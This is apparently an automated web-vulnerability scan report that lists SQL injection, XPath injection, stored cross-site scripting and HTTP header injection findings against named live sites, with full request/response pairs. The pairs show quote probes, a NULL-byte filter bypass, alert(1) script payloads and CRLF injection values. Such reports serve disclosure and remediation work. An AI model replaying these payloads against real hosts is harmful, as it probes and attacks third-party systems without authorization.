XSS, Reflected Cross Site Scripting, CWE-79, CAPEC-86, DORK, GHDB, BHDB, 09032011-04

SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.

Various attacks can be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and executing operating system commands.

Issue remediation

The most effective way to prevent SQL injection attacks is to use parameterised queries (also known as prepared statements) for all database access. This method uses two steps to incorporate potentially tainted data into SQL queries: first, the application specifies the structure of the query, leaving placeholders for each item of user input; second, the application specifies the contents of each placeholder. Because the structure of the query has already defined in the first step, it is not possible for malformed data in the second step to interfere with the query structure. You should review the documentation for your database and application platform to determine the appropriate APIs which you can use to perform parameterised queries. It is strongly recommended that you parameterise every variable data item that is incorporated into database queries, even if it is not obviously tainted, to prevent oversights occurring and avoid vulnerabilities being introduced by changes elsewhere within the code base of the application.

You should be aware that some commonly employed and recommended mitigations for SQL injection vulnerabilities are not always effective:

One common defence is to double up any single quotation marks appearing within user input before incorporating that input into a SQL query. This defence is designed to prevent malformed data from terminating the string in which it is inserted. However, if the data being incorporated into queries is numeric, then the defence may fail, because numeric data may not be encapsulated within quotes, in which case only a space is required to break out of the data context and interfere with the query. Further, in second-order SQL injection attacks, data that has been safely escaped when initially inserted into the database is subsequently read from the database and then passed back to it again. Quotation marks that have been doubled up initially will return to their original form when the data is reused, allowing the defence to be bypassed.
Another often cited defence is to use stored procedures for database access. While stored procedures can provide security benefits, they are not guaranteed to prevent SQL injection attacks. The same kinds of vulnerabilities that arise within standard dynamic SQL queries can arise if any SQL is dynamically constructed within stored procedures. Further, even if the procedure is sound, SQL injection can arise if the procedure is invoked in an unsafe manner using user-controllable data.

1.1. http://d3fd89.r.axf8.net/mr/e.gif [a parameter] next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://d3fd89.r.axf8.net
Path:	/mr/e.gif

Issue detail

The a parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the a parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /mr/e.gif?info=%7Bn%3Ac%7Cc%3A258447044937878%7Cd%3A1%7Ca%3AD3FD89%7Ch%3A1%7Ce%3ASacbee%7Cb%3Astory-detail%7Cl%3Ahttp%24*%24%2F%2Fwww.sacbee.com%2F2011%2F09%2F03%2F3883102%2Fsprint-could-be-winner-in-thwarted.html%7Cm%3A1920%7Co%3A1200%7Cp%3AWin32%7Cg%3AChrome%7Cf%3A13.0.782.220%7D%7Bn%3Au%7Ce%3A1%7D&a=D3FD89'&r=1&s=1 HTTP/1.1
Host: d3fd89.r.axf8.net
Proxy-Connection: keep-alive
Referer: http://www.sacbee.com/2011/09/03/3883102/sprint-could-be-winner-in-thwarted.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 500 Internal Server Error
Cache-Control: private
Content-Length: 3028
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Sun, 04 Sep 2011 00:59:22 GMT

<html>
<head>
<title>Runtime Error</title>
<style>
body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;}
p {font-family:"Verdana";fon
...[SNIP]...

Request 2

GET /mr/e.gif?info=%7Bn%3Ac%7Cc%3A258447044937878%7Cd%3A1%7Ca%3AD3FD89%7Ch%3A1%7Ce%3ASacbee%7Cb%3Astory-detail%7Cl%3Ahttp%24*%24%2F%2Fwww.sacbee.com%2F2011%2F09%2F03%2F3883102%2Fsprint-could-be-winner-in-thwarted.html%7Cm%3A1920%7Co%3A1200%7Cp%3AWin32%7Cg%3AChrome%7Cf%3A13.0.782.220%7D%7Bn%3Au%7Ce%3A1%7D&a=D3FD89''&r=1&s=1 HTTP/1.1
Host: d3fd89.r.axf8.net
Proxy-Connection: keep-alive
Referer: http://www.sacbee.com/2011/09/03/3883102/sprint-could-be-winner-in-thwarted.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 37
Content-Type: application/x-javascript; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Sun, 04 Sep 2011 00:59:23 GMT

gomez.b3(0,0);if(gomez.n0)gomez.n0();

1.2. http://ib.adnxs.com/getuidnb [Referer HTTP header] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://ib.adnxs.com
Path:	/getuidnb

Issue detail

The Referer HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Referer HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /getuidnb HTTP/1.1
Host: ib.adnxs.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=%00'

Response 1

HTTP/1.1 500 No url
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Mon, 05-Sep-2011 01:22:45 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=6422714091563403120; path=/; expires=Sat, 03-Dec-2011 01:22:45 GMT; domain=.adnxs.com; HttpOnly
Date: Sun, 04 Sep 2011 01:22:45 GMT
Content-Length: 0
Connection: close

Request 2

Response 2

HTTP/1.1 302 Moved
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Mon, 05-Sep-2011 01:22:45 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=6422714091563403120; path=/; expires=Sat, 03-Dec-2011 01:22:45 GMT; domain=.adnxs.com; HttpOnly
Location: P.T
Date: Sun, 04 Sep 2011 01:22:45 GMT
Content-Length: 0
Connection: close

1.3. http://metrics.sprint.com/b/ss/sprintuniversalsiteprod/1/H.22.1/s88955233080778 [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://metrics.sprint.com
Path:	/b/ss/sprintuniversalsiteprod/1/H.22.1/s88955233080778

Issue detail

The REST URL parameter 5 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 5, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

Request 1

GET /b/ss/sprintuniversalsiteprod/1/H.22.1%00'/s88955233080778?AQB=1&pccr=true&vidn=273164E305162D78-600001A660177E59&&ndh=1&t=3%2F8%2F2011%2019%3A44%3A28%206%20300&ce=UTF-8&pageName=HP%20%3A%20IHP%20%3A%20Sprint%20Home%20Page&g=http%3A%2F%2Fwww.sprint.com%2F&r=http%3A%2F%2Fwww.sprint.com%2F&cc=USD&ch=Home%20Page&server=www.sprint.com&h1=Home%20Page%7CHP%20%3A%20IHP&h2=D%3Dg&c3=Interstitial%20Home%20Page&c4=HP%20%3A%20IHP&c9=not%20logged-in&v13=D%3Dc40&v14=D%3Dc9&v20=D%3Dc3&v29=D%3Dc43&v30=D%3Dch&c40=D%3Dc4&c42=Shockwave%20Flash%2010.3%20r183&c43=www.sprint.com&v44=105E1B5AD68B10D605E2BDF5FE0A4306&c45=Home%20Page%2BHP%20%3A%20IHP%20%3A%20Sprint%20Home%20Page&c46=7%3A30PM&c47=Saturday&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1233&bh=1037&p=Shockwave%20Flash%3BQuickTime%20Plug-in%207.7%3BJava%20Deployment%20Toolkit%206.0.260.3%3BJava(TM)%20Platform%20SE%206%20U26%3BSilverlight%20Plug-In%3BMicrosoft%20Office%202010%3BChrome%20PDF%20Viewer%3BGoogle%20Earth%20Plugin%3BGoogle%20Updater%3BGoogle%20Update%3BiTunes%20Application%20Detector%3BWPI%20Detector%201.4%3BDefault%20Plug-in%3B&AQE=1 HTTP/1.1
Host: metrics.sprint.com
Proxy-Connection: keep-alive
Referer: http://www.sprint.com/
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=105E1B5AD68B10D605E2BDF5FE0A4306; TLTUID=105E1B5AD68B10D605E2BDF5FE0A4306; TLisset=true; mbox=check#true#1315097121|session#1315097027971-178294#1315098921|disable#browser%20timeout#1315100658; naf=userSeg~Interstitial Home Page; s_cc=true; gpv_p37=Home%20Page; gpv_p38=HP%20%3A%20IHP%20%3A%20Sprint%20Home%20Page; s_sq=%5B%5BB%5D%5D; s_sv_sid=203069262488; s_sv_112_p1=1@10@s/6293&e/2; s_sv_112_s1=1@16@a//1315097069380; s_vi=[CS]v1|273164E305162D78-600001A660177E59[CE]

Response 1

HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2011 01:02:30 GMT
Server: Omniture DC/2.0.0
Content-Length: 433
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /b/ss/sprintuniversalsiteprod/1/H.22.1 was not found
...[SNIP]...
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
...[SNIP]...

Request 2

GET /b/ss/sprintuniversalsiteprod/1/H.22.1%00''/s88955233080778?AQB=1&pccr=true&vidn=273164E305162D78-600001A660177E59&&ndh=1&t=3%2F8%2F2011%2019%3A44%3A28%206%20300&ce=UTF-8&pageName=HP%20%3A%20IHP%20%3A%20Sprint%20Home%20Page&g=http%3A%2F%2Fwww.sprint.com%2F&r=http%3A%2F%2Fwww.sprint.com%2F&cc=USD&ch=Home%20Page&server=www.sprint.com&h1=Home%20Page%7CHP%20%3A%20IHP&h2=D%3Dg&c3=Interstitial%20Home%20Page&c4=HP%20%3A%20IHP&c9=not%20logged-in&v13=D%3Dc40&v14=D%3Dc9&v20=D%3Dc3&v29=D%3Dc43&v30=D%3Dch&c40=D%3Dc4&c42=Shockwave%20Flash%2010.3%20r183&c43=www.sprint.com&v44=105E1B5AD68B10D605E2BDF5FE0A4306&c45=Home%20Page%2BHP%20%3A%20IHP%20%3A%20Sprint%20Home%20Page&c46=7%3A30PM&c47=Saturday&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1233&bh=1037&p=Shockwave%20Flash%3BQuickTime%20Plug-in%207.7%3BJava%20Deployment%20Toolkit%206.0.260.3%3BJava(TM)%20Platform%20SE%206%20U26%3BSilverlight%20Plug-In%3BMicrosoft%20Office%202010%3BChrome%20PDF%20Viewer%3BGoogle%20Earth%20Plugin%3BGoogle%20Updater%3BGoogle%20Update%3BiTunes%20Application%20Detector%3BWPI%20Detector%201.4%3BDefault%20Plug-in%3B&AQE=1 HTTP/1.1
Host: metrics.sprint.com
Proxy-Connection: keep-alive
Referer: http://www.sprint.com/
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=105E1B5AD68B10D605E2BDF5FE0A4306; TLTUID=105E1B5AD68B10D605E2BDF5FE0A4306; TLisset=true; mbox=check#true#1315097121|session#1315097027971-178294#1315098921|disable#browser%20timeout#1315100658; naf=userSeg~Interstitial Home Page; s_cc=true; gpv_p37=Home%20Page; gpv_p38=HP%20%3A%20IHP%20%3A%20Sprint%20Home%20Page; s_sq=%5B%5BB%5D%5D; s_sv_sid=203069262488; s_sv_112_p1=1@10@s/6293&e/2; s_sv_112_s1=1@16@a//1315097069380; s_vi=[CS]v1|273164E305162D78-600001A660177E59[CE]

Response 2

HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2011 01:02:30 GMT
Server: Omniture DC/2.0.0
xserver: www625
Content-Length: 0
Content-Type: text/html

2. XPath injection previous next
There are 2 instances of this issue:

/communities/campusrivalry/post/2011/09/live-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state/1 [REST URL parameter 2]
/communities/campusrivalry/post/2011/09/live-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state/1 [REST URL parameter 3]

Issue background

XPath injection vulnerabilities arise when user-controllable data is incorporated into XPath queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.

Depending on the purpose for which the vulnerable query is being used, an attacker may be able to exploit an XPath injection flaw to read sensitive application data or interfere with application logic.

Issue remediation

User input should be strictly validated before being incorporated into XPath queries. In most cases, it will be appropriate to accept input containing only short alhanumeric strings. At the very least, input containing any XPath metacharacters such as " ' / @ = * [ ] ( and ) should be rejected.

2.1. http://content.usatoday.com/communities/campusrivalry/post/2011/09/live-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state/1 [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://content.usatoday.com
Path:	/communities/campusrivalry/post/2011/09/live-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state/1

Issue detail

The REST URL parameter 2 appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the REST URL parameter 2, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application appears to be using the ASP.NET XPath APIs.

Request

GET /communities/campusrivalry'/post/2011/09/live-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state/1 HTTP/1.1
Host: content.usatoday.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/trends/hottrends?q=notre+dame+football&date=2011-9-3&sa=X
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CUR ADM DEVa TAIi PSAa PSDa CONi OUR OTRi IND PHY ONL UNI COM NAV DEM", POLICYREF="URI"
Date: Sun, 04 Sep 2011 00:42:30 GMT
Content-Length: 2862

<b>This is an unclosed string.</b><br/> at MS.Internal.Xml.XPath.XPathScanner.ScanString()<br/> at MS.Internal.Xml.XPath.XPathScanner.NextLex()<br/> at MS.Internal.Xml.XPath.XPathParser.ParsePri
...[SNIP]...
<br/> at System.Xml.XPath.XPathExpression.Compile(String xpath, IXmlNamespaceResolver nsResolver)<br/>
...[SNIP]...

2.2. http://content.usatoday.com/communities/campusrivalry/post/2011/09/live-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state/1 [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://content.usatoday.com
Path:	/communities/campusrivalry/post/2011/09/live-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state/1

Issue detail

The REST URL parameter 3 appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the REST URL parameter 3, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application appears to be using the ASP.NET XPath APIs.

Request

GET /communities/campusrivalry/post'/2011/09/live-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state/1 HTTP/1.1
Host: content.usatoday.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/trends/hottrends?q=notre+dame+football&date=2011-9-3&sa=X
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

3. Cross-site scripting (stored) previous next
There are 2 instances of this issue:

/bar/v16-504/c5/jsc/fm.js [$ parameter]
/bar/v16-504/c5/jsc/fm.js [$ parameter]

Issue background

Stored cross-site scripting vulnerabilities arise when data which originated from any tainted source is copied into the application's responses in an unsafe way. An attacker can use the vulnerability to inject malicious JavaScript code into the application, which will execute within the browser of any user who views the relevant application content.

The attacker-supplied code can perform a wide variety of actions, such as stealing victims' session tokens or login credentials, performing arbitrary actions on their behalf, and logging their keystrokes.

Methods for introducing malicious content include any function where request parameters or headers are processed and stored by the application, and any out-of-band channel whereby data can be introduced into the application's processing space (for example, email messages sent over SMTP which are ultimately rendered within a web mail application).

Stored cross-site scripting flaws are typically more serious than reflected vulnerabilities because they do not require a separate delivery mechanism in order to reach target users, and they can potentially be exploited to create web application worms which spread exponentially amongst application users.

Note that automated detection of stored cross-site scripting vulnerabilities cannot reliably determine whether attacks that are persisted within the application can be accessed by any other user, only by authenticated users, or only by the attacker themselves. You should review the functionality in which the vulnerability appears to determine whether the application's behaviour can feasibly be used to compromise other application users.

Remediation background

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:

Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitised.
User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (< > etc).

In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.

3.1. http://c7.zedo.com/bar/v16-504/c5/jsc/fm.js [$ parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://c7.zedo.com
Path:	/bar/v16-504/c5/jsc/fm.js

Issue detail

The value of the $ request parameter submitted to the URL /bar/v16-504/c5/jsc/fm.js is copied into a JavaScript string which is encapsulated in double quotation marks at the URL /bar/v16-504/c5/jsc/fm.js. The payload b395d"-alert(1)-"5904c46bd2c was submitted in the $ parameter. This input was returned unmodified in a subsequent request for the URL /bar/v16-504/c5/jsc/fm.js.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request 1

GET /bar/v16-504/c5/jsc/fm.js?c=825/403/1&a=0&f=&n=305&r=13&d=15&q=&$=b395d"-alert(1)-"5904c46bd2c&s=263&z=0.7735994893591851 HTTP/1.1
Host: c7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.charlotteobserver.com/2011/09/03/2577566/raceday-danica-already-gone.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZFFBbh=977B826,20|121_977#0; ZFFAbh=977B826,20|121_977#365; FFBbh=977B305,20|149_1#0; FFgeo=5386156; FFAbh=977B305,20|149_1#365; ZEDOIDA=k5xiThcyanucBq9IXvhSGSz5~090311

Request 2

GET /bar/v16-504/c5/jsc/fm.js?c=825/403/1&a=0&f=&n=305&r=13&d=15&q=&$=&s=263&z=0.7735994893591851 HTTP/1.1
Host: c7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.charlotteobserver.com/2011/09/03/2577566/raceday-danica-already-gone.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZFFBbh=977B826,20|121_977#0; ZFFAbh=977B826,20|121_977#365; FFBbh=977B305,20|149_1#0; FFgeo=5386156; FFAbh=977B305,20|149_1#365; ZEDOIDA=k5xiThcyanucBq9IXvhSGSz5~090311

Response 2

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFpb=305:b395d"-alert(1)-"5904c46bd2c,520d7%22%3b1cfa50ea780,520d7";expires=Sun, 04 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=305,825,15:305,825,0:0,825,15:305,0,15:0,0,0;expires=Sun, 04 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=39:1:1:0:1;expires=Sun, 04 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "8710bb37-8952-4aa4e77af70c0"
Vary: Accept-Encoding
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=213
Expires: Sun, 04 Sep 2011 01:08:03 GMT
Date: Sun, 04 Sep 2011 01:04:30 GMT
Content-Length: 1016
Connection: close

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var y10=new Image();

var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=263;var zzPat='b395d"-alert(1)-"5904c46bd2c,520d7%22%3b1cfa50ea780,520d7"';var zzCustom='';var zzTitle='';
if(typeof zzStr=='undefined'){
var zzStr="q=b395d"-alert(1)-"5904c46bd2c,520d7%22%3b1cfa50ea780,520d7";z="+Math.random();}

if(zzuid=='unknown')zzuid='k5xiThcyanucBq9IXvhSGSz5~090311';

var zzhasAd=undefined;
var zzpixie = new Image();
var zzRandom = Math.random();
var zzD
...[SNIP]...

3.2. http://c7.zedo.com/bar/v16-504/c5/jsc/fm.js [$ parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://c7.zedo.com
Path:	/bar/v16-504/c5/jsc/fm.js

Issue detail

The value of the $ request parameter submitted to the URL /bar/v16-504/c5/jsc/fm.js is copied into a JavaScript string which is encapsulated in single quotation marks at the URL /bar/v16-504/c5/jsc/fm.js. The payload 609c0'-alert(1)-'ce33e99e75d was submitted in the $ parameter. This input was returned unmodified in a subsequent request for the URL /bar/v16-504/c5/jsc/fm.js.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request 1

GET /bar/v16-504/c5/jsc/fm.js?c=825/403/1&a=0&f=&n=305&r=13&d=15&q=&$=609c0'-alert(1)-'ce33e99e75d&s=263&z=0.7735994893591851 HTTP/1.1
Host: c7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.charlotteobserver.com/2011/09/03/2577566/raceday-danica-already-gone.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZFFBbh=977B826,20|121_977#0; ZFFAbh=977B826,20|121_977#365; FFBbh=977B305,20|149_1#0; FFgeo=5386156; FFAbh=977B305,20|149_1#365; ZEDOIDA=k5xiThcyanucBq9IXvhSGSz5~090311

Request 2

Response 2

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFpb=305:609c0'-alert(1)-'ce33e99e75d,1726d%27%3b9f644ea3489,1726d';expires=Sun, 04 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=305,825,15:305,825,0:0,825,15:305,0,15:0,0,0;expires=Sun, 04 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=47:1:1:0:1;expires=Sun, 04 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "8710bb37-8952-4aa4e77af70c0"
Vary: Accept-Encoding
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=212
Expires: Sun, 04 Sep 2011 01:08:03 GMT
Date: Sun, 04 Sep 2011 01:04:31 GMT
Content-Length: 1016
Connection: close

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var y10=new Image();

var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=263;var zzPat='609c0'-alert(1)-'ce33e99e75d,1726d%27%3b9f644ea3489,1726d'';var zzCustom='';var zzTitle='';
if(typeof zzStr=='undefined'){
var zzStr="q=609c0'-alert(1)-'ce33e99e75d,1726d%27%3b9f644ea3489,1726d';z="+Math.random();}

if(zzuid=='un
...[SNIP]...

4. HTTP header injection previous next
There are 4 instances of this issue:

http://c7.zedo.com/bar/v16-504/c5/jsc/fm.js [$ parameter]
http://c7.zedo.com/bar/v16-504/c5/jsc/fmr.js [$ parameter]
http://c7.zedo.com/utils/ecSet.js [v parameter]
http://tacoda.at.atwola.com/rtx/r.js [si parameter]

Issue background

HTTP header injection vulnerabilities arise when user-supplied data is copied into a response header in an unsafe way. If an attacker can inject newline characters into the header, then they can inject new HTTP headers and also, by injecting an empty line, break out of the headers into the message body and write arbitrary content into the application's response.

Various kinds of attack can be delivered via HTTP header injection vulnerabilities. Any attack that can be delivered via cross-site scripting can usually be delivered via header injection, because the attacker can construct a request which causes arbitrary JavaScript to appear within the response body. Further, it is sometimes possible to leverage header injection vulnerabilities to poison the cache of any proxy server via which users access the application. Here, an attacker sends a crafted request which results in a "split" response containing arbitrary content. If the proxy server can be manipulated to associate the injected response with another URL used within the application, then the attacker can perform a "stored" attack against this URL which will compromise other users who request that URL in future.

Issue remediation

If possible, applications should avoid copying user-controllable data into HTTP response headers. If this is unavoidable, then the data should be strictly validated to prevent header injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into headers, and any other input should be rejected. At a minimum, input containing any characters with ASCII codes less than 0x20 should be rejected.

4.1. http://c7.zedo.com/bar/v16-504/c5/jsc/fm.js [$ parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://c7.zedo.com
Path:	/bar/v16-504/c5/jsc/fm.js

Issue detail

The value of the $ request parameter is copied into the Set-Cookie response header. The payload 54f5b%0d%0a606b90e0140 was submitted in the $ parameter. This caused a response containing an injected HTTP header.

Request

GET /bar/v16-504/c5/jsc/fm.js?c=825/403/1&a=0&f=&n=305&r=13&d=15&q=&$=54f5b%0d%0a606b90e0140&s=263&z=0.7735994893591851 HTTP/1.1
Host: c7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.charlotteobserver.com/2011/09/03/2577566/raceday-danica-already-gone.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZFFBbh=977B826,20|121_977#0; ZFFAbh=977B826,20|121_977#365; FFBbh=977B305,20|149_1#0; FFgeo=5386156; FFAbh=977B305,20|149_1#365; ZEDOIDA=k5xiThcyanucBq9IXvhSGSz5~090311

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFpb=305:54f5b
606b90e0140,3654a';expires=Sun, 04 Sep 2011 05: 00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=305,825,15:305,825,0:0,825,15:305,0,15:0,0,0;expires=Sun, 04 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=95:4:4:0:1;expires=Sun, 04 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
